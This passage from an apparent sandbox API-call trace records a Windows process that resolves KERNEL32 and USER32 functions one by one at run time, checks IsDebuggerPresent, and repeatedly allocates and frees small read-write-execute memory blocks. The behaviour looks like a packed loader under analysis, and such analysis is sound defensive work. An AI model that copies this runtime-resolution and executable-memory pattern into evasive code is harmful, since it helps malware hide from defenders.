dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.616] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.617] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.618] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.620] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.621] VirtualFree (lpAddress=0x3610000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.885] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.887] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0151.887] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.888] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleW") returned 0x769c3460 [0151.888] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.889] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0151.889] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.890] GetProcAddress (hModule=0x769b0000, lpProcName="LoadResource") returned 0x769c5904 [0151.890] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.891] GetProcAddress (hModule=0x769b0000, lpProcName="LockResource") returned 0x769c5911 [0151.891] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.892] GetProcAddress (hModule=0x769b0000, lpProcName="SizeofResource") returned 0x769c5a81 [0151.892] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.893] GetProcAddress (hModule=0x769b0000, lpProcName="FindResourceW") returned 0x769c5929 [0151.893] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.894] GetProcAddress (hModule=0x769b0000, lpProcName="FreeConsole") returned 0x76a67070 [0151.894] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.895] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileW") returned 0x769c3f0c [0151.895] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.896] GetProcAddress (hModule=0x769b0000, lpProcName="HeapSize") returned 0x77a13002 [0151.896] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.897] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcessHeap") returned 0x769c14c9 [0151.897] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.898] GetProcAddress (hModule=0x769b0000, lpProcName="SetStdHandle") returned 0x76a44aef [0151.898] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.899] GetProcAddress (hModule=0x769b0000, lpProcName="SetEnvironmentVariableW") returned 0x769c89a9 [0151.899] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.900] GetProcAddress (hModule=0x769b0000, lpProcName="WideCharToMultiByte") returned 0x769c16ed [0151.900] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.901] GetProcAddress (hModule=0x769b0000, lpProcName="EnterCriticalSection") returned 0x77a022b0 [0151.901] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.902] GetProcAddress (hModule=0x769b0000, lpProcName="LeaveCriticalSection") returned 0x77a02270 [0151.902] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.903] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSectionEx") returned 0x769c4ce0 [0151.903] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.904] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteCriticalSection") returned 0x77a145f5 [0151.904] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.905] GetProcAddress (hModule=0x769b0000, lpProcName="EncodePointer") returned 0x77a20fcb [0151.905] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.906] GetProcAddress (hModule=0x769b0000, lpProcName="DecodePointer") returned 0x77a19d35 [0151.906] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.907] GetProcAddress (hModule=0x769b0000, lpProcName="MultiByteToWideChar") returned 0x769c190e [0151.907] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.908] GetProcAddress (hModule=0x769b0000, lpProcName="LCMapStringEx") returned 0x76a44d91 [0151.908] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.908] GetProcAddress (hModule=0x769b0000, lpProcName="GetStringTypeW") returned 0x769c1926 [0151.909] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.910] GetProcAddress (hModule=0x769b0000, lpProcName="GetCPInfo") returned 0x769c5141 [0151.910] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.911] GetProcAddress (hModule=0x769b0000, lpProcName="QueryPerformanceCounter") returned 0x769c1705 [0151.911] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.912] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcessId") returned 0x769c11f8 [0151.912] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.913] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThreadId") returned 0x769c1430 [0151.913] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.914] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemTimeAsFileTime") returned 0x769c34b9 [0151.914] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.914] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeSListHead") returned 0x77a194a4 [0151.915] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.915] GetProcAddress (hModule=0x769b0000, lpProcName="IsDebuggerPresent") returned 0x769c4a15 [0151.915] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.916] GetProcAddress (hModule=0x769b0000, lpProcName="UnhandledExceptionFilter") returned 0x769e76f7 [0151.916] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.917] GetProcAddress (hModule=0x769b0000, lpProcName="SetUnhandledExceptionFilter") returned 0x769c8781 [0151.917] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.918] GetProcAddress (hModule=0x769b0000, lpProcName="GetStartupInfoW") returned 0x769c4cf8 [0151.918] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.919] GetProcAddress (hModule=0x769b0000, lpProcName="IsProcessorFeaturePresent") returned 0x769c51ed [0151.919] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.920] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcess") returned 0x769c17e9 [0151.920] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.921] GetProcAddress (hModule=0x769b0000, lpProcName="TerminateProcess") returned 0x769dd7d2 [0151.921] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.922] GetProcAddress (hModule=0x769b0000, lpProcName="RaiseException") returned 0x769c585e [0151.922] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.923] GetProcAddress (hModule=0x769b0000, lpProcName="RtlUnwind") returned 0x769ed1b3 [0151.923] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.924] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0151.971] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.973] GetProcAddress (hModule=0x769b0000, lpProcName="SetLastError") returned 0x769c11a9 [0151.973] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.974] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x769c18f6 [0151.974] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.975] GetProcAddress (hModule=0x769b0000, lpProcName="TlsAlloc") returned 0x769c4965 [0151.975] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.976] GetProcAddress (hModule=0x769b0000, lpProcName="TlsGetValue") returned 0x769c11e0 [0151.976] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.976] GetProcAddress (hModule=0x769b0000, lpProcName="TlsSetValue") returned 0x769c14db [0151.976] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.977] GetProcAddress (hModule=0x769b0000, lpProcName="TlsFree") returned 0x769c3537 [0151.977] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.978] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibrary") returned 0x769c3478 [0151.978] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.979] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryExW") returned 0x769c4915 [0151.979] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.980] GetProcAddress (hModule=0x769b0000, lpProcName="GetStdHandle") returned 0x769c516b [0151.980] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.981] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0151.981] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.982] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameW") returned 0x769c4908 [0151.982] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.983] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0151.983] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.984] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleExW") returned 0x769c4a27 [0151.984] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.985] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineA") returned 0x769c5159 [0151.985] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.986] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineW") returned 0x769c51db [0151.986] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.986] GetProcAddress (hModule=0x769b0000, lpProcName="HeapAlloc") returned 0x77a0e026 [0151.986] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.987] GetProcAddress (hModule=0x769b0000, lpProcName="HeapFree") returned 0x769c14a9 [0151.987] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.988] GetProcAddress (hModule=0x769b0000, lpProcName="CompareStringW") returned 0x769c3b7a [0151.988] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.989] GetProcAddress (hModule=0x769b0000, lpProcName="LCMapStringW") returned 0x769c1799 [0151.989] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.990] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocaleInfoW") returned 0x769c3bf2 [0151.990] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.991] GetProcAddress (hModule=0x769b0000, lpProcName="IsValidLocale") returned 0x769dce1e [0151.991] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.992] GetProcAddress (hModule=0x769b0000, lpProcName="GetUserDefaultLCID") returned 0x769c3d55 [0151.992] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.992] GetProcAddress (hModule=0x769b0000, lpProcName="EnumSystemLocalesW") returned 0x76a447ff [0151.993] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.993] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileType") returned 0x769c34e1 [0151.993] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.994] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0151.994] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.995] GetProcAddress (hModule=0x769b0000, lpProcName="FlushFileBuffers") returned 0x769c4653 [0151.995] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.996] GetProcAddress (hModule=0x769b0000, lpProcName="GetConsoleOutputCP") returned 0x769d9ae7 [0151.996] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.997] GetProcAddress (hModule=0x769b0000, lpProcName="GetConsoleMode") returned 0x769c1328 [0151.997] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.998] GetProcAddress (hModule=0x769b0000, lpProcName="ReadFile") returned 0x769c3e83 [0151.998] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0151.999] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileSizeEx") returned 0x769c599a [0151.999] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0152.000] GetProcAddress (hModule=0x769b0000, lpProcName="SetFilePointerEx") returned 0x769dc7df [0152.000] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0152.000] GetProcAddress (hModule=0x769b0000, lpProcName="ReadConsoleW") returned 0x76a67962 [0152.000] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0152.001] GetProcAddress (hModule=0x769b0000, lpProcName="HeapReAlloc") returned 0x77a21f6e [0152.001] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0152.002] GetProcAddress (hModule=0x769b0000, lpProcName="FindClose") returned 0x769c43fa [0152.002] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0152.002] GetProcAddress (hModule=0x769b0000, lpProcName="FindFirstFileExW") returned 0x769d17c9 [0152.015] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0152.016] GetProcAddress (hModule=0x769b0000, lpProcName="FindNextFileW") returned 0x769c54a6 [0152.016] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0152.017] GetProcAddress (hModule=0x769b0000, lpProcName="IsValidCodePage") returned 0x769c444b [0152.017] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0152.018] GetProcAddress (hModule=0x769b0000, lpProcName="GetACP") returned 0x769c177c [0152.018] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0152.021] GetProcAddress (hModule=0x769b0000, lpProcName="GetOEMCP") returned 0x769ed191 [0152.021] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0152.022] GetProcAddress (hModule=0x769b0000, lpProcName="GetEnvironmentStringsW") returned 0x769c519b [0152.022] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0152.022] GetProcAddress (hModule=0x769b0000, lpProcName="FreeEnvironmentStringsW") returned 0x769c5183 [0152.022] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x769b0000 [0152.023] GetProcAddress (hModule=0x769b0000, lpProcName="WriteConsoleW") returned 0x769e7a92 [0152.023] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x773b0000 [0152.024] GetProcAddress (hModule=0x773b0000, lpProcName="SendNotifyMessageA") returned 0x77426d5d [0152.024] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x773b0000 [0152.025] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0152.025] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x773b0000 [0152.025] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBeep") returned 0x773dc036 [0152.025] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0152.026] GetProcAddress (hModule=0x769b0000, lpProcName="LocalAlloc") returned 0x769c166c [0152.026] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0152.027] GetProcAddress (hModule=0x769b0000, lpProcName="LocalFree") returned 0x769c2cec [0152.027] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0152.027] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameW") returned 0x769c4908 [0152.027] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0152.028] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcessAffinityMask") returned 0x769ca829 [0152.028] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0152.029] GetProcAddress (hModule=0x769b0000, lpProcName="SetProcessAffinityMask") returned 0x76a434dc [0152.029] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0152.029] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadAffinityMask") returned 0x769e0570 [0152.029] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0152.030] GetProcAddress (hModule=0x769b0000, lpProcName="Sleep") returned 0x769c10ff [0152.030] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0152.031] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0152.031] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0152.032] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibrary") returned 0x769c3478 [0152.032] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0152.033] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryA") returned 0x769c498f [0152.034] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0152.035] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0152.035] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0152.035] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0152.035] LoadLibraryA (lpLibFileName="user32.dll") returned 0x773b0000 [0152.036] GetProcAddress (hModule=0x773b0000, lpProcName="GetProcessWindowStation") returned 0x773c9eea [0152.036] LoadLibraryA (lpLibFileName="user32.dll") returned 0x773b0000 [0152.037] GetProcAddress (hModule=0x773b0000, lpProcName="GetUserObjectInformationW") returned 0x773c8068 [0152.038] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.430] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.432] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.433] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.434] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.436] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.437] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.438] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.439] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.441] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.442] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.443] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.444] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.446] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.447] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.448] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.449] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.451] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.452] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.453] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.454] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.456] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.457] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.458] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.459] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.461] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.462] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.463] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.464] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.465] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.467] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.468] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.469] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.471] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.472] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.484] GetSystemTime (in: lpSystemTime=0x18fef4 | out: lpSystemTime=0x18fef4*(wYear=0x7e6, wMonth=0x1, wDayOfWeek=0x2, wDay=0xb, wHour=0x11, wMinute=0x33, wSecond=0xb, wMilliseconds=0x395)) [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.484] GetCurrentProcessId () returned 0xeec [0152.485] GetCurrentProcessId () returned 0xeec [0152.485] GetCurrentProcessId () returned 0xeec [0152.485] GetCurrentProcessId () returned 0xeec [0152.485] GetCurrentProcessId () returned 0xeec [0152.485] GetCurrentProcessId () returned 0xeec [0152.485] GetCurrentProcessId () returned 0xeec [0152.485] GetCurrentProcessId () returned 0xeec [0152.485] GetCurrentProcessId () returned 0xeec [0152.485] GetCurrentProcessId () returned 0xeec [0152.485] GetCurrentProcessId () returned 0xeec [0152.485] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0152.487] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.489] GetCurrentProcessId () returned 0xeec [0152.489] GetCurrentProcessId () returned 0xeec [0152.489] GetCurrentProcessId () returned 0xeec [0152.489] GetCurrentProcessId () returned 0xeec [0152.489] GetCurrentProcessId () returned 0xeec [0152.489] GetCurrentProcessId () returned 0xeec [0152.489] GetCurrentProcessId () returned 0xeec [0152.489] GetCurrentProcessId () returned 0xeec [0152.489] GetCurrentProcessId () returned 0xeec [0152.489] GetCurrentProcessId () returned 0xeec [0152.489] GetCurrentProcessId () returned 0xeec [0152.489] GetCurrentProcessId () returned 0xeec [0152.489] GetCurrentProcessId () returned 0xeec [0152.489] GetCurrentProcessId () returned 0xeec [0152.489] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0152.490] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.491] GetCurrentProcessId () returned 0xeec [0152.491] GetCurrentProcessId () returned 0xeec [0152.491] GetCurrentProcessId () returned 0xeec [0152.492] GetCurrentProcessId () returned 0xeec [0152.492] GetCurrentProcessId () returned 0xeec [0152.492] GetCurrentProcessId () returned 0xeec [0152.492] GetCurrentProcessId () returned 0xeec [0152.492] GetCurrentProcessId () returned 0xeec [0152.492] GetCurrentProcessId () returned 0xeec [0152.492] GetCurrentProcessId () returned 0xeec [0152.492] GetCurrentProcessId () returned 0xeec [0152.492] GetCurrentProcessId () returned 0xeec [0152.492] GetCurrentProcessId () returned 0xeec [0152.492] GetCurrentProcessId () returned 0xeec [0152.492] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0152.493] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.494] GetCurrentProcessId () returned 0xeec [0152.494] GetCurrentProcessId () returned 0xeec [0152.494] GetCurrentProcessId () returned 0xeec [0152.494] GetCurrentProcessId () returned 0xeec [0152.494] GetCurrentProcessId () returned 0xeec [0152.494] GetCurrentProcessId () returned 0xeec [0152.494] GetCurrentProcessId () returned 0xeec [0152.494] GetCurrentProcessId () returned 0xeec [0152.494] GetCurrentProcessId () returned 0xeec [0152.494] GetCurrentProcessId () returned 0xeec [0152.494] GetCurrentProcessId () returned 0xeec [0152.494] GetCurrentProcessId () returned 0xeec [0152.494] GetCurrentProcessId () returned 0xeec [0152.494] GetCurrentProcessId () returned 0xeec [0152.494] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0152.495] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.496] GetCurrentProcessId () returned 0xeec [0152.496] GetCurrentProcessId () returned 0xeec [0152.496] GetCurrentProcessId () returned 0xeec [0152.496] GetCurrentProcessId () returned 0xeec [0152.496] GetCurrentProcessId () returned 0xeec [0152.496] GetCurrentProcessId () returned 0xeec [0152.497] GetCurrentProcessId () returned 0xeec [0152.497] GetCurrentProcessId () returned 0xeec [0152.497] GetCurrentProcessId () returned 0xeec [0152.497] GetCurrentProcessId () returned 0xeec [0152.497] GetCurrentProcessId () returned 0xeec [0152.497] GetCurrentProcessId () returned 0xeec [0152.497] GetCurrentProcessId () returned 0xeec [0152.497] GetCurrentProcessId () returned 0xeec [0152.497] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0152.498] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.499] GetCurrentProcessId () returned 0xeec [0152.499] GetCurrentProcessId () returned 0xeec [0152.499] GetCurrentProcessId () returned 0xeec [0152.499] GetCurrentProcessId () returned 0xeec [0152.499] GetCurrentProcessId () returned 0xeec [0152.499] GetCurrentProcessId () returned 0xeec [0152.499] GetCurrentProcessId () returned 0xeec [0152.499] GetCurrentProcessId () returned 0xeec [0152.499] GetCurrentProcessId () returned 0xeec [0152.499] GetCurrentProcessId () returned 0xeec [0152.499] GetCurrentProcessId () returned 0xeec [0152.499] GetCurrentProcessId () returned 0xeec [0152.499] GetCurrentProcessId () returned 0xeec [0152.499] GetCurrentProcessId () returned 0xeec [0152.499] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3600000 [0152.500] VirtualFree (lpAddress=0x3600000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.501] GetCurrentProcessId () returned 0xeec [0152.501] GetCurrentProcessId () returned 0xeec [0152.501] GetCurrentProcessId () returned 0xeec [0152.501] GetCurrentProcessId () returned 0xeec [0152.540] GetCurrentProcessId () returned 0xeec [0152.540] GetCurrentProcessId () returned 0xeec [0152.540] GetCurrentProcessId () returned 0xeec [0152.540] GetCurrentProcessId () returned 0xeec [0152.540] GetCurrentProcessId () returned 0xeec [0152.540] GetCurrentProcessId () returned 0xeec [0152.540] GetCurrentProcessId () returned 0xeec [0152.540] GetCurrentProcessId () returned 0xeec [0152.540] GetCurrentProcessId () returned 0xeec [0152.540] GetCurrentProcessId () returned 0xeec [0152.540] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 